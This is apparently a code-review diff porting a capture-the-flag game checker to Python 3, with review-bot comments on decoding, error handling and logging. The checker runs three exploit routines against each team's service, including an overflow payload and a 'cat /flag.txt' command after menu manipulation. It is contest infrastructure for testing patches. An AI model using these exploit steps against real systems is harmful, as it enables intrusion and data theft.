diff --git a/checker.py b/checker.py index 1afa257..de888cb 100644 --- a/checker.py +++ b/checker.py @@ -1,9 +1,14 @@ -#! /usr/bin/env python2 +#! /usr/bin/env python3 # from pwn import context, remote from pwn import remote, context -from multiprocessing import pool -context.log_level = "error" +from multiprocessing import Pool +from time import sleep +import logging +import os +context.log_level = logging.ERROR + +INTERVAL = 60 HOST = "192.168.2.20" TOTAL_TEAMS = 10 FORMAT = "SlashRootCTF" @@ -13,7 +18,7 @@ def poc0(host, port): with remote(host, port) as p: p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">") + msg = p.recvuntil(">").decode('utf-8') # print(msg) if "young" in msg: p.sendline("y") @@ -23,11 +28,11 @@ def poc0(host, port): p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') # print flag if FORMAT in flag: return True @@ -48,7 +53,7 @@ def poc1(host, port): p.sendline("3") p.recvuntil(">") p.sendline("0") - if "Who" in p.recvuntil(">"): + if "Who" in p.recvuntil(">").decode('utf-8'): return False p.sendline("y") p.recvuntil(">") @@ -61,7 +66,7 @@ def poc1(host, port): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return True else: @@ -76,17 +81,17 @@ def poc2(host, port): p.sendline("y") p.recvuntil(">") p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">"): + if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") - flag = p.recvuntil("}") + flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: return True else: 
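Review bot: The header hunk adds `import os`, but none of the visible hunks use `os`. Drop the import unless code outside this diff needs it.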
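Review bot: The added `.decode('utf-8')` calls decode strictly, so a single non-UTF-8 byte in a reply raises UnicodeDecodeError instead of producing a True/False result. This applies to the first poc0 hunk and again to the later poc0, poc1 and poc2 hunks, all of which read bytes from a remote service the checker does not control. Decode leniently with `msg = p.recvuntil(">").decode('utf-8', errors='replace')`, or keep the data as bytes and test `if b"young" in msg:` and `if FORMAT.encode() in flag:`. These functions start and end outside the hunks, so whether they already catch the exception cannot be seen here.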
@@ -95,9 +100,50 @@ def poc2(host, port): return False +def poc(host, port): + with remote(host, port) as p: + msg = p.recvuntil(">").decode('utf-8') + if "Who" in msg: + p.sendline("Leo") + msg = p.recvuntil(">").decode('utf-8') + if "Leo" in msg: + p.sendline("Y") + msg = p.recvuntil(">").decode('utf-8') + if "What" in msg: + return True + return False + + +def check(team): + port = (60004 + (team*100)) + r = poc(HOST, port) + r0 = poc0(HOST, port) + r1 = poc1(HOST, port) + r2 = poc2(HOST, port) + return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) + + +def init_logging(logFileName: str, debug: bool = False): + logFormatter = logging.Formatter( + fmt="[%(asctime)s][%(levelname)s] %(message)s", + datefmt='%d-%b-%y %H:%M:%S') + + rootLogger = logging.getLogger("checker") + + consoleHandler = logging.StreamHandler() + consoleHandler.setFormatter(logFormatter) + rootLogger.addHandler(consoleHandler) + + rootLogger.setLevel(logging.DEBUG if debug else logging.INFO) + + return rootLogger + + if __name__ == "__main__": - for i in range(1, TOTAL_TEAMS+1): - r0 = poc0(HOST, (60004 + (i*100))) - r1 = poc1(HOST, (60004 + (i*100))) - r2 = poc2(HOST, (60004 + (i*100))) - print("Team [%s] %s %s %s" % (i, r0, r1, r2)) + checker_logger = init_logging("checker.log") + while True: + with Pool(TOTAL_TEAMS) as p: + results = p.map(check, range(1, TOTAL_TEAMS+1)) + for result in results: + checker_logger.info(result) + sleep(INTERVAL)
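Review bot: In `check`, any exception from a probe (a refused connection in `remote()`, an EOF in `recvuntil`, a decode error) propagates through `p.map` into the `while True` loop in `__main__`, so one team's service being down stops the whole checker; nothing in this hunk catches it. `poc` also calls `p.recvuntil(">")` without `timeout=`, so unless a default timeout is set elsewhere, a service that accepts the connection and stays silent can hold its worker and stall the round. Catch per-probe failures in `check` and report them as a result, as sketched below, and pass a timeout to the receives. Separately, `init_logging` never uses `logFileName`, so no `checker.log` is written; either add a `logging.FileHandler(logFileName)` or drop the parameter. poc0, poc1 and poc2 lie mostly outside the diff, so whether they already handle these errors cannot be told from here.

```python
def check(team):
    port = (60004 + (team*100))
    results = []
    for probe in (poc, poc0, poc1, poc2):
        try:
            results.append(probe(HOST, port))
        except Exception as exc:
            # A dead or misbehaving service is a result, not a checker crash.
            results.append("ERR:{}".format(type(exc).__name__))
    return "Team [{:02d}] {} {} {} {}".format(team, *results)
```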